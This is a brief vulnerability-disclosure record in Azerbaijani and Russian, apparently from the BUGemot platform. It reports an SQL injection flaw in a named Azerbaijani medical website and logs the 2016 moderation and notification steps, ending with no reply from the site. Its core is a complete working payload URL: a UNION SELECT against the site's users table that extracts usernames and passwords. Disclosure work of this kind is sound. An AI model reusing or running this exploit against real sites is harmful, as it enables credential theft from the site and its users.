Подробная информация
Saytda SQL İnjection mövcuddur.
Bu boşluqdan istifadə edərək saytda yerləşdirilmiş məlumatları (Parollar, saytın strukturu və s. əldə etmək olar)
Sql inject here: http://www.medekspert.az/index.php?type=xestelik&cid=25
Sql manual adress ( Username & password): http://www.medekspert.az/index.php?type=xestelik&cid=-25'+union+select+1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10+from+users--+-'
Записи
-
02 Ноябрь 2016, 13:36
Статус уязвимости
Нет ответа от источника -
04 Октябрь 2016, 10:06
Уязвимости присвоен балл
За перевод уязвимости дано переводчику 7 баллов -
04 Октябрь 2016, 10:06
Уязвимости присвоен балл
За перевод уязвимости дано автору 0 баллов -
14 Сентябрь 2016, 10:53
Статус уязвимости
Отправлено сообщение об уязвимости на электронный адрес источника -
11 Сентябрь 2016, 13:48
Уязвимости присвоен балл
Модератор присвоил 7 баллов из 10-и на уязвимости -
11 Сентябрь 2016, 13:47
Статус уязвимости
Подтверждено со стороны модератора -
10 Сентябрь 2016, 16:12
Добавлена уязвимость
Добавлена уязвимость на BUGemot